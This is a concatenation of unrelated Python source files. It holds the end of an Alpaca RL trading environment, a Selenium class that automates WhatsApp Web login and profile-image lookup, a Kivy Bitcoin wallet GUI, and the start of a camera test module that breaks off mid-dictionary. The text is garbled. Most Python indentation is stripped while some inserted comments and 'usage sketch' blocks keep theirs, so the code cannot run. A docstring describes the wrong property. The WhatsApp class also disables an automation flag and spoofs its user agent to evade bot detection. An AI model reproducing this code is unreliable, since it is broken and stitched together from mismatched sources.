self.observation_space = gym.spaces.Box(low=-3000, high=3000, shape=(state_dim,), dtype=np.float32)
self.action_space = gym.spaces.Box(low=-1, high=1, shape=(action_dim,), dtype=np.float32)
def reset(self):
return
def step(self, actions):
return
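# --- Usage sketch (illustrative only, not part of the original module) ---
# A minimal, hedged example of wiring up AlpacaPaperTrading_erl, assuming a
# trained ElegantRL PPO checkpoint in `cwd` and Alpaca paper-trading credentials.
# Every value below is a placeholder and must match your own trained agent.
if __name__ == '__main__':
    trader = AlpacaPaperTrading_erl(
        ticker_list=['AAPL', 'MSFT'],
        time_interval='1Min',
        agent='ppo',
        cwd='./trained_ppo',            # hypothetical checkpoint directory
        net_dim=512,
        state_dim=3 + 3 * 2 + 2 * 8,    # placeholder; see the state layout in get_state()
        action_dim=2,
        API_KEY='YOUR_ALPACA_KEY',
        API_SECRET='YOUR_ALPACA_SECRET',
        API_BASE_URL='https://paper-api.alpaca.markets',
        tech_indicator_list=['macd', 'rsi_30', 'cci_30', 'dx_30',
                             'close_30_sma', 'close_60_sma', 'boll_ub', 'boll_lb'],
    )
    trader.run()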
|
whatsapp_web.py
|
import os
import io
import re
import base64
import tkinter
import urllib.parse
from PIL import ImageTk, Image
from threading import Thread, Event
from selenium import webdriver
from selenium.webdriver import ChromeOptions
from selenium.common.exceptions import NoSuchElementException
USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84'
WHATSAPP_API_SCRIPT = os.path.join(os.path.dirname(__file__), '..', 'scripts', 'whatsapp_api.js')
class WhatsAppWeb:
def __init__(self, executable_path, headless=True):
options = ChromeOptions()
options.headless = headless
options.add_argument('--incognito')
options.add_argument('--lang=en_US')
options.add_argument('--window-size=1366x768')
options.add_argument('disable-blink-features=AutomationControlled')
options.add_argument(f'user-agent={USER_AGENT}')
options.add_argument("--log-level=OFF")
options.add_experimental_option('excludeSwitches', ['enable-logging'])
self._driver = webdriver.Chrome(executable_path=executable_path, options=options)
self._driver.implicitly_wait(15)
self._driver.get('https://web.whatsapp.com')
self._login()
self._load_whatsapp_api()
def get_contact_profile_image_url(self, jid):
return self._driver.execute_async_script("""
let resolve = arguments[1];
window.whatsapp_api.getContactProfileImage(arguments[0]).then((url) => resolve(url));
""", jid)
def get_user_profile_image_url(self):
url = self._driver.find_element_by_xpath('//div[@id="side"]//img').get_attribute('src')
        # str.lstrip() strips a character set, not a prefix, so remove the
        # 'https://web.whatsapp.com/pp?e=' prefix explicitly before decoding.
        prefix = 'https://web.whatsapp.com/pp?e='
        if url.startswith(prefix):
            url = url[len(prefix):]
return urllib.parse.unquote(url)
def _login(self):
def _check_login(quit_event):
try:
self._driver.find_element_by_xpath("//div[@title='New chat']")
except NoSuchElementException:
raise RuntimeError('login state was not identified')
finally:
quit_event.set()
qr_code = self._get_qr_image()
quit_event = Event()
Thread(target=_check_login, args=(quit_event,), daemon=True).start()
self._show_image(qr_code, 'WhatsApp Web QR Code', quit_event)
def _show_image(self, image, title, quit_event):
def _wait_quit_event(tk, event):
event.wait()
tk.destroy()
root = tkinter.Tk()
root.title(title)
render = ImageTk.PhotoImage(image)
img = tkinter.Label(image=render)
img.pack(side=tkinter.TOP)
Thread(target=_wait_quit_event, args=(root, quit_event), daemon=True).start()
root.mainloop()
def _get_qr_image(self):
canvas_element = self._driver.find_element_by_xpath('//canvas[@aria-label="Scan me!"]')
image_url = self._driver.execute_script('return arguments[0].toDataURL()', canvas_element)
base64_data = re.sub('^data:image/.+;base64,', '', image_url)
return Image.open(io.BytesIO(base64.b64decode(base64_data)))
def _load_whatsapp_api(self):
with open(WHATSAPP_API_SCRIPT) as file:
self._driver.execute_script(file.read())
self._driver.execute_script('window.whatsapp_api = new window.WhatsAppAPI();')
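# --- Usage sketch (illustrative only, not part of the original module) ---
# A minimal, hedged example of driving WhatsAppWeb. The chromedriver path and
# the contact JID are placeholders; WhatsApp JIDs typically look like
# '<phone number>@c.us', but verify against your own data.
if __name__ == '__main__':
    client = WhatsAppWeb(executable_path='/usr/local/bin/chromedriver', headless=False)
    # After the QR code shown in the Tk window has been scanned, the session is logged in.
    print(client.get_user_profile_image_url())
    print(client.get_contact_profile_image_url('15551234567@c.us'))  # hypothetical JID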
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import wampum
from wampum.bitcoin import TYPE_ADDRESS
from wampum import WalletStorage, Wallet
from wampum_gui.kivy.i18n import _
from wampum.paymentrequest import InvoiceStore
from wampum.util import profiler, InvalidPassword
from wampum.plugins import run_hook
from wampum.util import format_satoshis, format_satoshis_plain
from wampum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='wampum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='wampum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='wampum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='wampum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register a widget cache to keep memory usage down; the timeout is set to
# forever so the cached data is never evicted
Cache.register('wampum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='wampum_gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from wampum.util import base_units
class WampumWindow(App):
wampum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from wampum.bitcoin import NetworkConstants
pp = servers.get(host, NetworkConstants.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.wampum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.wampum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.wampum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.wampum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.wampum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
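    # Worked example (assuming base_units maps 'mBTC' to 5 decimal places and an
    # exchange rate of 30000 fiat/BTC): btc_to_fiat('100') converts '100 mBTC' to
    # 100 * 10**5 = 10,000,000 satoshis via get_amount(), then
    # 10,000,000 * 30000 / 10**8 = 3000.00 in fiat.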
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Wampum App')
self.wampum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', False)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so that UI updates happen at most twice per second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
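        # Clock.create_trigger(cb, 0.5) returns a callable that schedules `cb`
        # 0.5s later and ignores further calls while that call is still pending,
        # so bursts of events coalesce into a single UI refresh.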
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from wampum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from wampum.transaction import Transaction
from wampum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from wampum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from wampum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.wampum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
        Logger.info('Time to on_start: {} <<<<<<<<'.format(time.perf_counter()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.wampum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.wampum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Wampum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.wampum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Wampum. This function performs the basic
        tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='wampum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='wampum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('wampum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('wampum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/wampum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.wampum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.wampum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Wampum', message,
app_icon=icon, app_name='Wampum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
        ''' Show an error message bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
        ''' Show an info message bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
        '''Method to show an information bubble.
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
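        # A minimal call sketch (illustrative only; the atlas icon path mirrors the
        # ones already used by show_info/show_error in this file):
        #     self.show_info_bubble(text=_('Copied'), duration=2, width='200dp',
        #                           icon='atlas://gui/kivy/theming/light/important')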
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
new1.py
|
import numpy as np
import cv2
import time
import threading
import wave
from pyaudio import PyAudio, paInt16
from automatedtest.common.tools.logger.logger import logger
from automatedtest.common.tools.logger.utils import Utils
class BaseCamera(object):
def __init__(self):
self._utils = Utils()
self.FrameID = {
'pos_msec': cv2.CAP_PROP_POS_MSEC,
'pos_frames': cv2.CAP_PROP_POS_FRAMES,
'pos_avi_ratio': cv2.CAP_PROP_POS_AVI_RATIO,
'frame_width': cv2.CAP_PROP_FRAME_WIDTH,
'frame_height': cv2.CAP_PROP_FRAME_HEIGHT,
'fps': cv2.CAP_PROP_FPS,
'fourcc': cv2.CAP_PROP_FOURCC,
'frame_count': cv2.CAP_PROP_FRAME_COUNT,
